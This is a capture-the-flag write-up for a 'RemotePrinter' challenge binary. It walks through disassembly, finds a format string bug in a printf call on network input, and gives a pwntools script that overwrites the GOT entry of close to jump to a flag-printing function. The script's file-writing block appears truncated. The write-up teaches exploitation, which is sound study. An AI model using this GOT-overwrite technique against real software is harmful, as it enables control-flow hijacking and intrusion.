• Category: Exploit
  • Points: 80
  • Description:

Printer are very very important for offices. Especially for remote printing. My boss told me to build a tool for that task.


So this remote printer takes an address and a port and connects to the remote service. It then reads some data and outputs it. Well let’s just point it to itself:

$ nc 12377
This is a remote printer!
Enter IPv4 address:
Enter port:12377
Thank you, I'm trying to print now!
This is a remote printer!

The last line is the input from itself. So we probably need a listener reachable via the internet.

The binary itself is rather small, it just consists of the main function and 0x08048786. The main function uses scanf to read the ip address and port and calls the second function which connects to the given ip address and port. Then receives up to 0x2000 bytes of data and then prints it. Let’s take a look at the later one:

0x08048815      6a00           push 0
0x08048817      6800200000     push 0x2000
0x0804881c      8d85e4dfffff   lea eax, [ebp-local_2055]
0x08048822      50             push eax
0x08048823      ff75f4         push dword [ebp - 0xc]
0x08048826      e885fdffff     call sym.imp.recv         ; recv 0x2000 to stack


0x08048844      83ec0c         sub esp, 0xc
0x08048847      8d85e4dfffff   lea eax, [ebp-local_2055]
0x0804884d      50             push eax
0x0804884e      e88dfcffff     call sym.imp.printf      ; input
0x08048853      83c410         add esp, 0x10
0x08048856      83ec0c         sub esp, 0xc
0x08048859      ff75f4         push dword [ebp - 0xc]
0x0804885c      e85ffdffff     call sym.imp.close
0x08048861      83c410         add esp, 0x10
0x08048864      90             nop

We can see that the buffer, which is located on the stack, is printed using printf… oh. Classic format string vulnerability. Should be easy.

$ python2 -c 'print "ABCD" + ".%p"*100' | nc -vv -l -p 4444
$ nc 12377
This is a remote printer!
Enter IPv4 address:X.X.X.X
Enter port:4444
Thank you, I'm trying to print X.X.X.X:4444 now!

So it’s definitely a format string vulnerability and we can see that at offset 7 is the start of our format string. So that’s where we can put the addresses we want to write to.

We can see that immediately after the call to printf there is a call to close. So we do the usual: Overwrite GOT entry of close with something of our liking to take over control flow. Because the organizers were nice they left us some dead code lying around that will print us the flag at 0x08048867. So we’ll just redirect control flow there.

from pwn import *  # NOQA

velf = ELF("./RemotePrinter")
gotclose = velf.got["close"]

# uses two 2-byte writes to keep printed garbage at minimum
fmtstr = p32(gotclose)
fmtstr += p32(gotclose + 2)
target = 0x08048867
x = 0x0804 - 8
y = 0x8867 - 8 - x
fmtstr += "%{}c%8$hn%{}c%7$hn".format(x, y)

log.info("trying to write to got entry @ {}".format(hex(gotclose)))
log.info("overwriting with function {}".format(hex(target)))

log.info("using format string: \n" + hexdump(fmtstr))

with open("./payload", "wb") as f:

# use with
# cat payload | nc -v -l -p 4444

And we have the flag: